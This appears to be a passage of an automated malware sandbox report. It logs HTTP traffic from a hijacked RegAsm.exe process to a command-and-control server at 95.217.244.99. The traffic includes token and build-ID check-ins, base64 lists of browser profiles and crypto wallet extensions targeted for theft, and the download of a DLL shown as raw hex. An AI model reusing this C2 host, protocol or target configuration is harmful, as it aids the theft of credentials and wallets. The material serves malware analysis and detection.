                                                                                                                                                                                                                                      2024-04-23 19:43:59 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4b 4b 46 49 4a 4b 46 43 41 4b 4a 4a 4a 4b 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 32 33 61 61 36 36 33 35 62 30 32 62 32 35 64 33 33 30 66 32 31 30 64 64 39 38 32 37 62 62 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4b 46 49 4a 4b 46 43 41 4b 4a 4a 4a 4b 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4b 46 49 4a 4b 46 43 41 4b 4a 4a 4a 4b 4a 4b 46 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                      Data Ascii: ------HJKKFIJKFCAKJJJKJKFIContent-Disposition: form-data; name="token"9523aa6635b02b25d330f210dd9827bb------HJKKFIJKFCAKJJJKJKFIContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------HJKKFIJKFCAKJJJKJKFICont
                                                                                                                                                                                                                                      2024-04-23 19:44:00 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 19:44:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-04-23 19:44:00 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                                                                                                                                                      Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      4192.168.2.64971195.217.244.994432632C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-23 19:44:01 UTC262OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----GIEBFHCAKFBGDHIDHIDB
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                      Host: 95.217.244.99
                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-04-23 19:44:01 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 32 33 61 61 36 36 33 35 62 30 32 62 32 35 64 33 33 30 66 32 31 30 64 64 39 38 32 37 62 62 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                      Data Ascii: ------GIEBFHCAKFBGDHIDHIDBContent-Disposition: form-data; name="token"9523aa6635b02b25d330f210dd9827bb------GIEBFHCAKFBGDHIDHIDBContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------GIEBFHCAKFBGDHIDHIDBCont
                                                                                                                                                                                                                                      2024-04-23 19:44:01 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 19:44:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-04-23 19:44:01 UTC5165INData Raw: 31 34 32 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                      Data Ascii: 1420TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      5192.168.2.64971295.217.244.994432632C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-23 19:44:02 UTC263OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDB
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                      Host: 95.217.244.99
                                                                                                                                                                                                                                      Content-Length: 7797
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-04-23 19:44:02 UTC7797OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 32 33 61 61 36 36 33 35 62 30 32 62 32 35 64 33 33 30 66 32 31 30 64 64 39 38 32 37 62 62 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                      Data Ascii: ------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="token"9523aa6635b02b25d330f210dd9827bb------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------IDAKJKEHDBGHIDHIEHDBCont
                                                                                                                                                                                                                                      2024-04-23 19:44:03 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 19:44:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-04-23 19:44:03 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      6192.168.2.64971395.217.244.994432632C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-23 19:44:03 UTC178OUTGET /sqln.dll HTTP/1.1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                      Host: 95.217.244.99
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-04-23 19:44:04 UTC248INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 19:44:03 GMT
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Content-Length: 2459136
                                                                                                                                                                                                                                      Last-Modified: Mon, 22 Apr 2024 11:42:56 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      ETag: "66264d40-258600"
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      2024-04-23 19:44:04 UTC16136INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                                                                                                                                                                      2024-04-23 19:44:04 UTC16384INData Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                      Data Ascii: X~e!*FW|>|L1146
                                                                                                                                                                                                                                      2024-04-23 19:44:04 UTC16384INData Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b
                                                                                                                                                                                                                                      Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
                                                                                                                                                                                                                                      2024-04-23 19:44:04 UTC16384INData Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08
                                                                                                                                                                                                                                      Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
                                                                                                                                                                                                                                      2024-04-23 19:44:04 UTC16384INData Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff
                                                                                                                                                                                                                                      Data Ascii: $;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|D$9D$8vQ
                                                                                                                                                                                                                                      2024-04-23 19:44:04 UTC16384INData Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                      Data Ascii: 3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                                                                                                                                                                      2024-04-23 19:44:04 UTC16384INData Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                      Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                                                                                                                                                      2024-04-23 19:44:04 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68
                                                                                                                                                                                                                                      Data Ascii: Vt$W|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
                                                                                                                                                                                                                                      2024-04-23 19:44:04 UTC16384INData Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f
                                                                                                                                                                                                                                      Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$L$J_
                                                                                                                                                                                                                                      2024-04-23 19:44:04 UTC16384INData Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83
                                                                                                                                                                                                                                      Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      7192.168.2.64971495.217.244.994432632C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-23 19:44:06 UTC262OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----HJDGHIJDGCBAAAAAFIJD
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                      Host: 95.217.244.99
                                                                                                                                                                                                                                      Content-Length: 829
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-04-23 19:44:06 UTC829OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 32 33 61 61 36 36 33 35 62 30 32 62 32 35 64 33 33 30 66 32 31 30 64 64 39 38 32 37 62 62 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                      Data Ascii: ------HJDGHIJDGCBAAAAAFIJDContent-Disposition: form-data; name="token"9523aa6635b02b25d330f210dd9827bb------HJDGHIJDGCBAAAAAFIJDContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------HJDGHIJDGCBAAAAAFIJDCont
                                                                                                                                                                                                                                      2024-04-23 19:44:07 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 19:44:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-04-23 19:44:07 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      8192.168.2.64971595.217.244.994432632C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
